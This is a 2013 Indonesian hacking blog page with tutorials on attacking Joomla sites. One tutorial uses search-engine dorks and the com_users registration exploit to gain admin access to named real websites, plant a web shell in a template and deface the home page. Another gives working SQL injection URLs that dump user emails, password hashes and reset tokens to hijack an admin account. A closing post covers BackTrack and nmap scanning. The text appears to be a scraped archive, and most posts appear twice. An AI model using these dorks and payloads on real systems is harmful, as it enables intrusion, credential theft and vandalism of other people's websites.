Showing posts with label Exploit. Show all posts
Showing posts with label Exploit. Show all posts
Wednesday, 25 September 2013
Exploit Joomla Com_user terbaru 2013
22:27
ok kareyak dari kalian yang meminta tutor deface dengan trik com_user, kali ini saya akan memberi gambaran tentang deface dengan com_user. ok langsung ja ke TKP
1. Download dulu xploit joomla
Exploit 1
Exploit 2
Exploit 1 atau 2 sama saja,cuma beda tampilanya aja kok... :D
dan download shell 1n73ction Disini
Dork:
inurl:Home Page Beez5 joomla 1.6 index.php/using-joomla/extensions/components/users-component/registration-form site:br
site:com inurl:Home Page Beez joomla 1.6 index.php using-joomla
inurl:index.php joomla! 1.7 - open source content management site:
inurl:index.php/using-joomla/extension/components/content-component/article-category-list/50-upgraders site:com
intext:joomla! 1.7 - open source content management site:jp
inurl:index.php/19-sample-data-articles/joomla/50-upgraders site:id
inurl:index.php/using-joomla/extensions/templates/beez-2/home-page-beez-2 site:as
inurl:index.php/19-sample-data-articles/joomla site:com
Jangan Lupa Dork kembangin lagi :)
Exploit :
index.php?option=com_users&view=registration
selanjutnya cari target vuln dengan dork diatas. yang kalian perlu tau perbedaan site vul dengan tidak vuln liat gambar berikut :
Kali ini saya sudah dapat target http://esv.be
lalu kita exploit sehingga menjadi http://esv.be/%20index.php?option=com_users&view=registration
dan tampilanya menjadi seperti gambar
setelah itu tekan ctrl+u dan kemudian tekan ctrl+f lalu ketik "hidden" (tanpa tanda petik)
dan cari kode seperti yang saya tunjuk panah merah itu
setelah ketemu,buka file xploit yang kamu download tadi buka ke notepad,lalu copy code yang seperti digambar diatas dan pastekan di file exploit tadi. lihat gambar
ok setelah itu copy juga url web target http://gym-megal.tri.sch.gr dan pastekan di file exploit. lihatr gambar
nb: ganti tulisan test@gmail dengan alamat gmail kamu,atas bawah harus sama ya... :) ok lanjut
setela itu klik save.
kemudian cari dimana kamu menyimpan file exploit tadi dan klik 2 x jadi seperti ini
dan klik Register
Nanti kalian akan dibawa ke halaman register lagi. isi passwordnya sesukamu. lihat gambar
pada kali ini pssword ane ini "kacang",dan klik yang register pada tnda merah itu artinya register,jika vuln maka akan seperi gambar
dan link konfirmasi akan dikirim ke email kamu.
sekarang kita buka email kita liaht pada kotak masuk apakah sudah terkirim link konfirmasi apa blm
ok setelah link konfirmsi msuk ke email kita kita klik link nya. Lihat gambar
setelah di klik nanti akan di arahkan kesini. lihat gambar
isikan user name : genesis
password : kacang
sesuai dengan yang di email yang kita terima tadi, setelah login akan seperti ini. lihat gambar
Ok registrasi selesai,,,ada pertanyaan sampai sini..???
kalu ga ada kita lanjut ke halaman administratornya http://esv.be/administrator/
Masukkan username : genesis
dan pssword : kacang
lalu klik login
daaaaannn...taraaaaaaa kita masuk ke cpanelnya
lalu klik pada template nya seperti yang saya kasih tanda panah merah itu.
setelah itu klik templates yang saa beri panah seperti pada gambar di bawah
pilih satu template.kali ini saya memilih "atomic"
setelah di klik lalu klik Wijzigen hoofdpagina template lihat gambar
hapus smua code yang ada pada kotak tersebut
ok...sekarang buka file shell yang kalian download tadi. klik kanan open with notepad.
kopi code script shellnya dan pastekan di kotak tadi lalu klik save. Lihat gambar
jika shell tertanam dan suk sukses akan seperti gambar
saatnya memanggil shell, jadi perintahnya http://esv.be/templates/atomic/index.php dan enter maka akan ada tampilan backdoor. setelah itu tekan Tab pada keyboart atau arahkan kursor ke tengah yang saya beri tanda panah.Lihat gambar
dan masukan paswordnya 1n73ction dan enter. Lihat gambar
setelah itu anda akan melihat tampilan shell.
setelah itu klik atomic.lihat gambar
cari index.php dan klik edit .Lihat gambar
haspus semua code yang da di dalam kotak dan ganti dengan script deface kamu. Lihat gambar
ubah /customers/4/9/f/esv.be/httpd.www/templates/atomic/index.php menjadi /customers/4/9/f/esv.be/httpd.www/index.php dan klik save.
setelah itu buka url webnya dan silahkan di show offin dah
hasil esv.be/
ok sekian dari saya jangan lupa gabung juga di grup kami
https://www.facebook.com/groups/indonesianhackeranonymous/
https://www.facebook.com/groups/vandetaindonesiananonymousteam/
Terima Kasih
1. Download dulu xploit joomla
Exploit 1
Exploit 2
Exploit 1 atau 2 sama saja,cuma beda tampilanya aja kok... :D
dan download shell 1n73ction Disini
Dork:
inurl:Home Page Beez5 joomla 1.6 index.php/using-joomla/extensions/components/users-component/registration-form site:br
site:com inurl:Home Page Beez joomla 1.6 index.php using-joomla
inurl:index.php joomla! 1.7 - open source content management site:
inurl:index.php/using-joomla/extension/components/content-component/article-category-list/50-upgraders site:com
intext:joomla! 1.7 - open source content management site:jp
inurl:index.php/19-sample-data-articles/joomla/50-upgraders site:id
inurl:index.php/using-joomla/extensions/templates/beez-2/home-page-beez-2 site:as
inurl:index.php/19-sample-data-articles/joomla site:com
Jangan Lupa Dork kembangin lagi :)
Exploit :
index.php?option=com_users&view=registration
selanjutnya cari target vuln dengan dork diatas. yang kalian perlu tau perbedaan site vul dengan tidak vuln liat gambar berikut :
Kali ini saya sudah dapat target http://esv.be
lalu kita exploit sehingga menjadi http://esv.be/%20index.php?option=com_users&view=registration
dan tampilanya menjadi seperti gambar
setelah itu tekan ctrl+u dan kemudian tekan ctrl+f lalu ketik "hidden" (tanpa tanda petik)
dan cari kode seperti yang saya tunjuk panah merah itu
setelah ketemu,buka file xploit yang kamu download tadi buka ke notepad,lalu copy code yang seperti digambar diatas dan pastekan di file exploit tadi. lihat gambar
ok setelah itu copy juga url web target http://gym-megal.tri.sch.gr dan pastekan di file exploit. lihatr gambar
nb: ganti tulisan test@gmail dengan alamat gmail kamu,atas bawah harus sama ya... :) ok lanjut
setela itu klik save.
kemudian cari dimana kamu menyimpan file exploit tadi dan klik 2 x jadi seperti ini
dan klik Register
Nanti kalian akan dibawa ke halaman register lagi. isi passwordnya sesukamu. lihat gambar
pada kali ini pssword ane ini "kacang",dan klik yang register pada tnda merah itu artinya register,jika vuln maka akan seperi gambar
dan link konfirmasi akan dikirim ke email kamu.
sekarang kita buka email kita liaht pada kotak masuk apakah sudah terkirim link konfirmasi apa blm
ok setelah link konfirmsi msuk ke email kita kita klik link nya. Lihat gambar
setelah di klik nanti akan di arahkan kesini. lihat gambar
isikan user name : genesis
password : kacang
sesuai dengan yang di email yang kita terima tadi, setelah login akan seperti ini. lihat gambar
Ok registrasi selesai,,,ada pertanyaan sampai sini..???
kalu ga ada kita lanjut ke halaman administratornya http://esv.be/administrator/
Masukkan username : genesis
dan pssword : kacang
lalu klik login
daaaaannn...taraaaaaaa kita masuk ke cpanelnya
lalu klik pada template nya seperti yang saya kasih tanda panah merah itu.
setelah itu klik templates yang saa beri panah seperti pada gambar di bawah
pilih satu template.kali ini saya memilih "atomic"
setelah di klik lalu klik Wijzigen hoofdpagina template lihat gambar
hapus smua code yang ada pada kotak tersebut
ok...sekarang buka file shell yang kalian download tadi. klik kanan open with notepad.
kopi code script shellnya dan pastekan di kotak tadi lalu klik save. Lihat gambar
jika shell tertanam dan suk sukses akan seperti gambar
saatnya memanggil shell, jadi perintahnya http://esv.be/templates/atomic/index.php dan enter maka akan ada tampilan backdoor. setelah itu tekan Tab pada keyboart atau arahkan kursor ke tengah yang saya beri tanda panah.Lihat gambar
dan masukan paswordnya 1n73ction dan enter. Lihat gambar
setelah itu anda akan melihat tampilan shell.
setelah itu klik atomic.lihat gambar
cari index.php dan klik edit .Lihat gambar
haspus semua code yang da di dalam kotak dan ganti dengan script deface kamu. Lihat gambar
ubah /customers/4/9/f/esv.be/httpd.www/templates/atomic/index.php menjadi /customers/4/9/f/esv.be/httpd.www/index.php dan klik save.
setelah itu buka url webnya dan silahkan di show offin dah
hasil esv.be/
ok sekian dari saya jangan lupa gabung juga di grup kami
https://www.facebook.com/groups/indonesianhackeranonymous/
https://www.facebook.com/groups/vandetaindonesiananonymousteam/
Terima Kasih
Thursday, 12 September 2013
Joomla com_user Vulnerability Scanner
21:44
Ok,siang ini saya akan membagikan Tool untuk mencari website joomla yang vuln,
password : 1mp4ct_404
Ok sekian dari saya, salam 1mp4ct_404
Tutorial Reset Password Joomla Dengan Token
11:11
Ok malam ini saya akan membagikan trik reset password dengan token,
Siap kan bahan-bahan,
- Kopi
- Kratingdeng
- Rokok
- Cemilan
- Dan sedikit otak untuk berfikir
Langsung saja
Dork >
inurl:"option com_artforms"
Exploit mencari Email >
index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(email,0x3a,us
ername,0x3a,password)+from+jos_users--
Exploit reset >
index.php?option=com_user&view=reset
Exploit mencari token >
index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(username,0x3a
,activation)+from+jos_users
Saya disini mendapat target
http://www.vernonfrost-mu.com
Setelah itu kita exploit untuk mencari Email target sehingga menjadi
http://www.vernonfrost-mu.com/index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(email,0x3a,us
ername,0x3a,password)+from+jos_users--
Dan kita mendapat emailnya
Selanjutnya kita reset dengan memasukan exploit sehingga
http://www.vernonfrost-mu.com/index.php?option=com_user&view=reset
setelah muncul kotak emailnya kamu masukan emailnya dan klik submit
Selanjutnya kita mencari user name dan token,Kita masukan exploitnya sehingga menjadi
http://www.vernonfrost-mu.com/index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(username,0x3a
,activation)+from+jos_users
Tuch,dah keliatan username sama tokenya
username : lsioq
Token : 5d02jkqwum7e5195e1be311b27f25404a2d55187ab
kita kembali lagi ke sini
http://www.vernonfrost-mu.com/index.php?option=com_user&view=reset
setelah memasukan email dan klik submit tadi maka tmpilanya begini
Setelah itu kalian masukan username dan passwordnya lalu klik submit bila vuln kamu langsung bisa mereset password dan kamu bisa login ke cpanelnya.
Sekian tutorial dari saya semoga bermanfaat.
created by : 1mp4ct_404
Siap kan bahan-bahan,
- Kopi
- Kratingdeng
- Rokok
- Cemilan
- Dan sedikit otak untuk berfikir
Langsung saja
Dork >
inurl:"option com_artforms"
Exploit mencari Email >
index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(email,0x3a,us
ername,0x3a,password)+from+jos_users--
Exploit reset >
index.php?option=com_user&view=reset
Exploit mencari token >
index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(username,0x3a
,activation)+from+jos_users
Saya disini mendapat target
http://www.vernonfrost-mu.com
Setelah itu kita exploit untuk mencari Email target sehingga menjadi
http://www.vernonfrost-mu.com/index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(email,0x3a,us
ername,0x3a,password)+from+jos_users--
Dan kita mendapat emailnya
Selanjutnya kita reset dengan memasukan exploit sehingga
http://www.vernonfrost-mu.com/index.php?option=com_user&view=reset
setelah muncul kotak emailnya kamu masukan emailnya dan klik submit
Selanjutnya kita mencari user name dan token,Kita masukan exploitnya sehingga menjadi
http://www.vernonfrost-mu.com/index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(username,0x3a
,activation)+from+jos_users
Tuch,dah keliatan username sama tokenya
username : lsioq
Token : 5d02jkqwum7e5195e1be311b27f25404a2d55187ab
kita kembali lagi ke sini
http://www.vernonfrost-mu.com/index.php?option=com_user&view=reset
setelah memasukan email dan klik submit tadi maka tmpilanya begini
Setelah itu kalian masukan username dan passwordnya lalu klik submit bila vuln kamu langsung bisa mereset password dan kamu bisa login ke cpanelnya.
Sekian tutorial dari saya semoga bermanfaat.
created by : 1mp4ct_404
Thursday, 18 April 2013
Eksploitasi Jaringan Menggunakan Backtrack
11:07
BackTrack adalah salah satu distro linux yang merupakan turunan dari slackware yang mana merupakan merger dari whax dan auditor security collection.
BackTrack menyediakan akses mudah untuk tools komprehensif yang berhubungan dengan keamanan, mulai dari Port Scanner sampai Password Scanner. Dukungan fungsi Live CD dan Live USB mengijinkan pengguna untuk me-boot BackTrack secara langsung dari media penyimpan portabel tanpa harus melakukan penginstallan pada Hardisk secara permanen.
BackTrack berisi banyak tools keamanan yang terkenal yaitu:
Setting Jaringan
Setting jaringan sangat berpengaruh terhadap koneksi antar perangkat dalam jaringan. Di backtrack hal pertama yang harus dilakukan adalah mengalokasi IP Address sehingga backtrack dapat terkoneksi ke jaringan. Untuk setting IP address dapat dilakukan dengan cara :
Jika hasil yang ditampilkan seperti gambar di atas, berarti Backtrack sudah memiliki IP Address yaitu 192.168.197.250/24.
Untuk mengetes apakah Backtrack sudah dapat berkomunikasi dengan perangkat lain dalam jaringan, gunakan perintah sebagai berikut :
root@root:~# ping 192.168.197.1
Apabila ada reply dari host 192.168.197.1, artinya anda sudah terhubung ke perangkat dengan IP address tersebut.
Scanning Network dengan NMAP
Scanning network adalah salah satu kegiatan untuk mengetahui host mana saja yang aktif dan terkoneksi ke dalam jaringan. Di Backtrack banyak tools untuk melakukan proses scanning, diantaranya nmap.
Nmap memetakan dan memberikan informasi host yang aktif dan terkoneksi ke dalam jaringan. Semua informasi host yang terkoneksi akan ditampilkan, termasuk port apa saja yang terbuka.
Untuk melakukan scanning dengan nmap gunakan perintah berikut :
root@root:~# nmap 192.168.3.201
Dari gambar terlihat port 80, 135, 139, 443, 445 pada host 192.168.3.201 berstatus open (terbuka). Kita juga mengetahui MAC Address host tersebut yaitu 60:EB:69:CE:71:80.
Semua informasi yang ditampilkan tersebut adalah informasi yang sangat berharga bagi siapa saja yang memiliki “kemampuan lebih” untuk bisa menyusup atau menerobos ke host 192.168.3.201 terlepas dari apa maksud dan alasannya.
Selain scanning IP address dengan target tertentu, nmap dapat juga digunakan untuk melakukan scanning secara keseluruhan atau menurut kelompok IP Address.
root@root:~# nmap 192.168.3.1-254
Hasilnya adalah sebagai berikut :
Berdasarkan gambar di atas terlihat nmap menampilkan informasi setiap host secara detil.
BackTrack menyediakan akses mudah untuk tools komprehensif yang berhubungan dengan keamanan, mulai dari Port Scanner sampai Password Scanner. Dukungan fungsi Live CD dan Live USB mengijinkan pengguna untuk me-boot BackTrack secara langsung dari media penyimpan portabel tanpa harus melakukan penginstallan pada Hardisk secara permanen.
BackTrack berisi banyak tools keamanan yang terkenal yaitu:
- Metasploit integration (Non-Working and Officially Unsupported
- RFMON Injection capable wireless drivers
- Aircrack-NG
- Kismet
- Nmap
- Ophcrack
- Ettercap
- Wireshark (formerly known as Ethereal)
- BeEF (Browser Exploitation Framework)
- Hydra
- OWASP Mantra Security Framework collection of hacking tools, add-ons and scripts based on Firefox
- Cisco OCS Mass Scanner A very reliable and fast scanner for Cisco routers with telnet/enable default password.
- Quypt (Terminal Emulator) (software pribadi oleh Crimson Hacking group, yang telah dimasukan ke bagian utama) Blackhat
- Banyak kumpulan exploits serta software yang lebih umum seperti browsers.
- Information Gathering
- Vulnerability Assessment
- Exploitation Tools
- Privilege Escalation
- Maintaining Access
- Reverse Engineering
- RFID Tools
- Stress testing
- Forensics
- Reporting Tools
- Services
- Miscellaneous
Setting Jaringan
Setting jaringan sangat berpengaruh terhadap koneksi antar perangkat dalam jaringan. Di backtrack hal pertama yang harus dilakukan adalah mengalokasi IP Address sehingga backtrack dapat terkoneksi ke jaringan. Untuk setting IP address dapat dilakukan dengan cara :
root@root:~# ifconfig eth0 192.168.197.250 netmask 255.255.255.0Perintah di atas berfungsi untuk mengalokasi IP Address 192.168.197.250/24 ke ethernet backtrack. Untuk mengetahui IP address yang terpasang gunakan perintah sebagai berikut:
root@root:~# ifconfig
Jika hasil yang ditampilkan seperti gambar di atas, berarti Backtrack sudah memiliki IP Address yaitu 192.168.197.250/24.
Untuk mengetes apakah Backtrack sudah dapat berkomunikasi dengan perangkat lain dalam jaringan, gunakan perintah sebagai berikut :
root@root:~# ping 192.168.197.1
Apabila ada reply dari host 192.168.197.1, artinya anda sudah terhubung ke perangkat dengan IP address tersebut.
Scanning Network dengan NMAP
Scanning network adalah salah satu kegiatan untuk mengetahui host mana saja yang aktif dan terkoneksi ke dalam jaringan. Di Backtrack banyak tools untuk melakukan proses scanning, diantaranya nmap.
Nmap memetakan dan memberikan informasi host yang aktif dan terkoneksi ke dalam jaringan. Semua informasi host yang terkoneksi akan ditampilkan, termasuk port apa saja yang terbuka.
Untuk melakukan scanning dengan nmap gunakan perintah berikut :
root@root:~# nmap 192.168.3.201
Dari gambar terlihat port 80, 135, 139, 443, 445 pada host 192.168.3.201 berstatus open (terbuka). Kita juga mengetahui MAC Address host tersebut yaitu 60:EB:69:CE:71:80.
Semua informasi yang ditampilkan tersebut adalah informasi yang sangat berharga bagi siapa saja yang memiliki “kemampuan lebih” untuk bisa menyusup atau menerobos ke host 192.168.3.201 terlepas dari apa maksud dan alasannya.
Selain scanning IP address dengan target tertentu, nmap dapat juga digunakan untuk melakukan scanning secara keseluruhan atau menurut kelompok IP Address.
root@root:~# nmap 192.168.3.1-254
Hasilnya adalah sebagai berikut :
Berdasarkan gambar di atas terlihat nmap menampilkan informasi setiap host secara detil.
Subscribe to:
Posts (Atom)